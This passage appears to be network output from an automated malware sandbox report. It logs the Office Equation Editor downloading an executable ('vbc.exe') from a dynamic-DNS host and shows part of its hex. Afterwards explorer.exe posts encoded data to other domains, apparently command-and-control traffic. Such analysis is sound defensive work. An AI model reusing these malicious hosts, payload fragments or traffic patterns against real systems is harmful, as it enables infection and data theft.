                                                                                                                                                      Nov 27, 2020 12:15:43.391119957 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.391158104 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.391232014 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.391285896 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.526194096 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.526231050 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.526293993 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.526820898 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.528220892 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.528239965 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.528258085 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.528271914 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.528271914 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.528290033 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.528312922 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.528342962 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.528369904 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.528378010 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.528383017 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.528388023 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.663096905 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663161039 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663192034 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663227081 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663269043 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663307905 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663345098 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663393021 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663434982 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663472891 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663467884 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.663512945 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663516998 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.663526058 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.663532972 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.663552999 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663556099 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.663592100 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663597107 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.663631916 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663631916 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.663671017 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663671017 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.663707972 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.663722038 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.663753986 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.663794994 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.667530060 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.798528910 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.798585892 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.798625946 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.798666954 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.798716068 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.798758984 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.798798084 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.798805952 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.798836946 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.798856020 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.798866034 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.798877954 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.798907042 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.798917055 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.798945904 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.798965931 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.798998117 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799017906 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799035072 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799062014 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799079895 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799134970 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799164057 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799177885 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799185991 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799238920 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799264908 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799283981 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799292088 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799340963 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799370050 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799391985 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799442053 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799444914 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799460888 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799503088 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799503088 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799556971 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799581051 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799607992 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799609900 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799660921 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799679995 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799710989 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.799710989 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.799760103 CET8049165162.251.123.239192.168.2.22

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 27, 2020 12:15:43.011753082 CET5219753192.168.2.228.8.8.8
                                                                                                                                                      Nov 27, 2020 12:15:43.063569069 CET53521978.8.8.8192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.064001083 CET5219753192.168.2.228.8.8.8
                                                                                                                                                      Nov 27, 2020 12:15:43.099514008 CET53521978.8.8.8192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:16:43.572763920 CET5309953192.168.2.228.8.8.8
                                                                                                                                                      Nov 27, 2020 12:16:43.619985104 CET53530998.8.8.8192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:17:03.973156929 CET5283853192.168.2.228.8.8.8
                                                                                                                                                      Nov 27, 2020 12:17:04.012594938 CET53528388.8.8.8192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:17:22.729402065 CET6120053192.168.2.228.8.8.8
                                                                                                                                                      Nov 27, 2020 12:17:22.776010036 CET53612008.8.8.8192.168.2.22

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Nov 27, 2020 12:15:43.011753082 CET192.168.2.228.8.8.80xee0bStandard query (0)amachichywsdyjakelogontothecomputewsrty.ydns.euA (IP address)IN (0x0001)
                                                                                                                                                      Nov 27, 2020 12:15:43.064001083 CET192.168.2.228.8.8.80xee0bStandard query (0)amachichywsdyjakelogontothecomputewsrty.ydns.euA (IP address)IN (0x0001)
                                                                                                                                                      Nov 27, 2020 12:16:43.572763920 CET192.168.2.228.8.8.80x708cStandard query (0)www.gedefo.comA (IP address)IN (0x0001)
                                                                                                                                                      Nov 27, 2020 12:17:03.973156929 CET192.168.2.228.8.8.80xccffStandard query (0)www.letstalkop.comA (IP address)IN (0x0001)
                                                                                                                                                      Nov 27, 2020 12:17:22.729402065 CET192.168.2.228.8.8.80x2e78Standard query (0)www.realestateworld.clubA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Nov 27, 2020 12:15:43.063569069 CET8.8.8.8192.168.2.220xee0bNo error (0)amachichywsdyjakelogontothecomputewsrty.ydns.eu162.251.123.239A (IP address)IN (0x0001)
                                                                                                                                                      Nov 27, 2020 12:15:43.099514008 CET8.8.8.8192.168.2.220xee0bNo error (0)amachichywsdyjakelogontothecomputewsrty.ydns.eu162.251.123.239A (IP address)IN (0x0001)
                                                                                                                                                      Nov 27, 2020 12:16:43.619985104 CET8.8.8.8192.168.2.220x708cNo error (0)www.gedefo.com91.195.241.137A (IP address)IN (0x0001)
                                                                                                                                                      Nov 27, 2020 12:17:04.012594938 CET8.8.8.8192.168.2.220xccffNo error (0)www.letstalkop.comletstalkop.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                      Nov 27, 2020 12:17:04.012594938 CET8.8.8.8192.168.2.220xccffNo error (0)letstalkop.com184.168.131.241A (IP address)IN (0x0001)
                                                                                                                                                      Nov 27, 2020 12:17:22.776010036 CET8.8.8.8192.168.2.220x2e78No error (0)www.realestateworld.clubghs.google.comCNAME (Canonical name)IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • amachichywsdyjakelogontothecomputewsrty.ydns.eu
                                                                                                                                                      • www.gedefo.com
                                                                                                                                                      • www.letstalkop.com

                                                                                                                                                      HTTP Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.2249165162.251.123.23980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 27, 2020 12:15:43.254117012 CET1OUTGET /amchdoc/vbc.exe HTTP/1.1
                                                                                                                                                      Accept: */*
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                      Host: amachichywsdyjakelogontothecomputewsrty.ydns.eu
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Nov 27, 2020 12:15:43.391005039 CET2INHTTP/1.1 200 OK
                                                                                                                                                      Date: Fri, 27 Nov 2020 11:15:42 GMT
                                                                                                                                                      Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                                                                                                                                                      Last-Modified: Thu, 26 Nov 2020 18:13:37 GMT
                                                                                                                                                      ETag: "62600-5b50680b5ce8d"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 402944
                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f5 24 1d e4 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 c2 05 00 00 62 00 00 00 00 00 00 52 e1 05 00 00 20 00 00 00 00 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ff e0 05 00 4f 00 00 00 00 00 06 00 1c 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 06 00 0c 00 00 00 68 e0 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 c1 05 00 00 20 00 00 00 c2 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1c 5e 00 00 00 00 06 00 00 60 00 00 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 24 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 e1 05 00 00 00 00 00 48 00 00 00 02 00 05 00 88 61 00 00 b0 2c 00 00 03 00 00 00 20 00 00 06 38 8e 00 00 30 52 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 11 01 00 00 00 00 00 00 02 14 7d 01 00 00 04 02 16 7d 02 00 00 04 02 16 7d 03 00 00 04 02 16 7d 04 00 00 04 02 16 7d 05 00 00 04 02 22 00 00 00 00 7d 06 00 00 04 02 22 00 00 00 00 7d 07 00 00 04 02 22 00 00 00 00 7d 08 00 00 04 02 22 00 00 00 00 7d 09 00 00 04 02 22 00 00 00 00 7d 0a 00 00 04 02 22 00 00 00 00 7d 0b 00 00 04 02 22 00 00 00 00 7d 0c 00 00 04 02 22 00 00 00 00 7d 0d 00 00 04 02 16 7d 0e 00 00 04 02 16 7d 0f 00 00 04 02 23 00 00 00 00 00 00 00 00 7d 10 00 00 04 02 16 7d 11 00 00 04 02 16 7d 12 00 00 04 02 16 7d 13 00 00 04 02 16 7d 14 00 00 04 02 16 7d 15 00 00 04 02 16 7d 16 00 00 04 02 16 7d 17 00 00 04 02 16 7d 18 00 00 04 02 16 7d 19 00 00 04 02 16 7d 1a 00 00 04 02 16 7d 1b 00 00 04 02 16 7d 1c 00 00 04 02 16 7d 1d 00 00 04 02 14 7d 1f 00 00 04 02 28 10 00 00 0a 00 00 15 28 11 00 00 0a 00 02 28 0e 00 00 06 00 2a 92 00 02 7b 33 00 00 04 28 12 00 00 0a 6f 13 00 00 0a 00 02 7b 34 00 00 04 28 12 00 00 0a 6f 13 00 00 0a 00 2a 00 00 13 30 05 00 e2 02 00 00 01 00 00 11 00 02 7b 06 00 00 04 22 00 00 6c 42 fe 03 16 fe 01 0a 06 39 c0 00 00 00 00 02 7b 06 00 00 04 22 00 00 20 41 fe 04 0b 07 2c 55 00 02 7b 35 00 00 04 1b 8d 2a 00 00 01 25 16 02 7b 08 00 00 04 28 14 00 00 0a a2 25 17 72 01 00 00 70 a2 25 18 02
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$0bR @ @O^`h8 H.text` `.rsrc^`@@.reloc`$@B3Ha, 80R0}}}}}"}"}"}"}"}"}"}"}}}#}}}}}}}}}}}}}}}(((*{3(o{4(o*0{"lB9{" A,U{5*%{(%rp%


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      1192.168.2.224916691.195.241.13780C:\Windows\explorer.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 27, 2020 12:16:43.656876087 CET427OUTGET /zsh/?bF=yL9uBTbbG78KoSpXRM0AXioxGrUEzFPLco0s68NkbehqPfZZENvYiAeYWN1dA1cuKz052A==&hhD4=gXzh_b&sql=1 HTTP/1.1
                                                                                                                                                      Host: www.gedefo.com
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii:
                                                                                                                                                      Nov 27, 2020 12:16:43.720218897 CET428INHTTP/1.1 302 Found
                                                                                                                                                      date: Fri, 27 Nov 2020 11:16:43 GMT
                                                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                                                      content-length: 0
                                                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_JZkxYp3VE++gQzVbEuTqmdSihApZ1BiYKWIgoQp2QeVa1gtjz0qm9VXpMBDLhGosnxmy3xEJ9rq69/Po1L3IBg==
                                                                                                                                                      expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                      cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                      pragma: no-cache
                                                                                                                                                      last-modified: Fri, 27 Nov 2020 11:16:43 GMT
                                                                                                                                                      location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=gedefo.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                                                                                                      x-cache-miss-from: parking-87855bdf5-ntq24
                                                                                                                                                      server: NginX
                                                                                                                                                      connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      2192.168.2.224916791.195.241.13780C:\Windows\explorer.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Nov 27, 2020 12:16:45.827852011 CET431OUTPOST /zsh/ HTTP/1.1
                                                                                                                                                      Host: www.gedefo.com
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Length: 261372
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Origin: http://www.gedefo.com
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                      Accept: */*
                                                                                                                                                      Referer: http://www.gedefo.com/zsh/
                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                      Data Raw: 62 46 3d 36 70 78 55 66 33 58 52 59 66 30 4d 6f 52 6f 41 4f 38 34 57 4a 48 38 31 41 34 4d 79 34 6b 61 4b 4f 65 70 4f 31 75 67 2d 54 75 41 76 49 39 51 43 4b 34 33 48 35 67 71 58 4b 61 74 74 59 42 38 64 50 44 41 6c 31 39 69 75 66 61 4d 6f 69 74 5a 64 59 77 54 6a 71 6b 6d 38 6e 68 4b 30 32 54 4b 5f 6b 4d 50 47 74 42 77 6a 49 62 52 78 69 54 34 69 6c 7a 47 71 5a 76 56 78 6c 74 74 67 69 66 58 6f 61 41 7e 41 4c 62 62 44 50 75 4d 74 56 34 4b 30 35 49 44 45 38 6c 79 6c 43 36 41 78 39 55 52 4b 62 54 74 5f 68 30 78 6c 49 37 6f 64 72 42 65 61 4b 34 62 72 51 6d 58 43 31 39 57 39 4a 75 6a 70 6b 48 4a 4c 56 4b 65 6e 57 34 62 39 43 63 6c 6e 6e 68 6b 46 47 2d 49 50 6e 52 32 76 74 35 66 6c 7a 44 4f 73 4f 46 55 39 67 63 72 49 30 33 62 64 47 31 78 55 7e 41 64 4e 57 73 28 6f 68 70 79 73 6c 2d 4c 6a 41 67 4c 50 75 42 77 50 5a 76 59 37 7a 5a 4c 65 68 59 54 4d 37 65 41 45 36 64 53 79 4c 68 49 31 52 6f 77 64 78 58 6d 2d 4c 48 34 69 6e 38 61 65 66 65 53 6e 37 36 78 61 37 6a 43 49 38 6c 4b 33 34 73 59 63 4b 35 53 4b 6f 4a 4c 56 34 73 34 67 72 2d 32 69 35 76 56 30 46 66 4a 54 72 57 55 5a 34 57 30 78 79 44 6a 71 77 63 32 45 78 6c 35 78 4f 35 35 48 61 52 77 79 35 6c 50 6c 73 49 65 49 31 41 62 31 6f 49 62 47 75 7a 56 78 34 6e 5a 4a 6c 4b 51 64 67 48 6b 32 4d 2d 37 7a 69 76 58 79 54 68 65 4a 33 37 57 39 49 48 7a 49 77 33 6e 68 66 77 49 67 47 34 71 54 45 2d 36 68 61 41 39 73 63 4d 59 55 41 63 39 79 6e 53 67 57 56 67 46 53 61 35 67 38 41 6c 73 4f 64 33 5a 6a 70 66 42 47 4d 38 4c 66 70 45 6b 55 6a 46 52 48 28 75 31 4a 63 6e 43 76 36 4e 28 64 37 39 73 65 50 4e 33 61 67 50 34 34 61 74 70 64 7e 4b 64 66 6d 2d 44 6e 48 75 72 4c 6a 71 36 31 67 75 4b 61 42 65 49 4b 65 39 62 42 6c 7a 71 71 66 36 6c 75 6c 45 63 7a 72 72 6e 4b 57 34 67 37 78 45 72 36 73 72 49 6b 5a 79 48 68 47 32 77 51 42 63 67 74 63 32 49 55 68 30 38 4b 50 56 42 4a 37 44 49 71 44 56 4f 70 38 5f 66 7a 75 6d 45 56 7e 53 43 6d 28 6b 6c 43 34 4b 4c 53 7e 69 77 78 46 2d 74 4c 72 66 59 54 79 66 32 6c 5a 4e 47 4e 6a 56 6b 47 79 4c 37 58 4b 67 7e 73 6e 45 4f 63 57 4e 42 38 79 79 35 4b 68 44 68 61 44 6e 37 43 4e 4e 6a 45 4a 4e 4a 65 7e 50 41 49 50 58 79 59 62 49 45 71 46 4a 6c 78 7e 54 4a 35 78 56 69 32 4c 39 55 39 62 42 62 7a 33 64 64 6f 4a 53 30 34 4f 73 54 36 72 46 78 5a 54 41 63 58 4f 4d 76 51 54 79 49 61 73 79 45 4a 66 76 77 6c 75 72 42 4d 53 34 69 39 61 4a 39 50 42 38 4e 35 6f 6f 79 69 6c 71 65 79 35 53 78 6e 5a 33 47 61 54 69 54 48 75 43 41 4b 75 48 32 33 4e 76 5a 33 7a 79 71 36 4b 7a 63 41 50 67 31 6c 73 7a 28 42 6a 48 76 59 70 77 5a 6e 58 39 74 59 6c 4f 67 49 79 67 72 51 46 47 33 70 45 63 48 47 4c 42 59 38 4e 46 71 55 4b 55 52 69 6e 2d 63 53 42 4a 35 6f 5a 66 68 51 55 45 61 44 36 7a 77 78 4b 55 39 4b 42 78 44 74 48 67 6f 32 30 4d 77 57 59 66 4f 34 51 38 48 65 43 73 58 6a 56 56 57 75 43 6c 41 38 70 57 65 36 47 52 36 69 35 45 36 45 4f 4e 33 4e 6e 39 41 6c 62 6d 7e 35 57 64 56 59 74 49 74 63 4f 74 54 71 4f 57 51 53 33 31 34 32 6b 76 30 64 41 51 79 37 4c 66 74 4c 78 58 6c 5a 28 6f 73 49 5a 34 75 68 56 35 38 34 77 66 6e 38 79 77 49 49 44 35 73 38 71 66 74 38 41 70 61 6f 35 31 4c 45 43 74 32 57 56 5a 79 32 73 50 54 50 76 4c 61 45 4e 33 4f 42 6f 78 6a 34 7a 65 58 79 37 76 50 68 71 44 4a 35 45 75 4a 59 65 76 5a 56 6c 52 5a 7a 53 55 58 39 65 69 63 7a 34 41 78 50 75 69 42 34 47 6b 7a 32 75 5f 37 6b 46 76 37 44 76 4c 64 77 78 34 67 65 47 71 71 59 58 59 35 67 4f 48 38 59 53 74 7a 67 54 37 72 59 57 4d 42 5f 38 53 46 54 33 32 57 58 6b 4d 74 6b 32 77 7e 6f 6f 4c 34 2d 55 48 30 49 35 75 71 44 69 35 4c 69 78 6b 58 50 76 2d 47 32 77 6d 32 42 46 43 64 35 39 77 4f 6a 32 5f 6f 77 42 37 43 61 74 5f 64 5a 55 4e 4e 57 64 32 28 73 37 54 4f 4c 4f 64 66 47 39 53 68 4a 75 5f 32 4e 50 37 67 2d 55 38 78 70 78 65 61 59 30 2d 69 69 56 61 58 57 31 51 37 41 79 38 6f 4c 6c 42 5a 44 66 76 63 38 7a 79 53 36 72 35 67 47 4b 32 43 61 74 79 34 36 30 42 52 37 7e 68 55 65 59 58 43 4b 70 6c 72 56 53 6a 30 34 45 42 47 58 4f 61 33 4e 75 6b 45 76 43 66 62 35 74 39 38 51 4e 65 73 66 48 4b 53 2d 43 42 39 68 6c 64 63 77 65 6b 6a 4a 6f 41 76 44 53 49 4e 4f 30 6d 69 4d 28 55 5a 70 45 33 4c 6e 65 79 51 54 67 31 55 6f 4a 53 36 5a 77 73 77 62
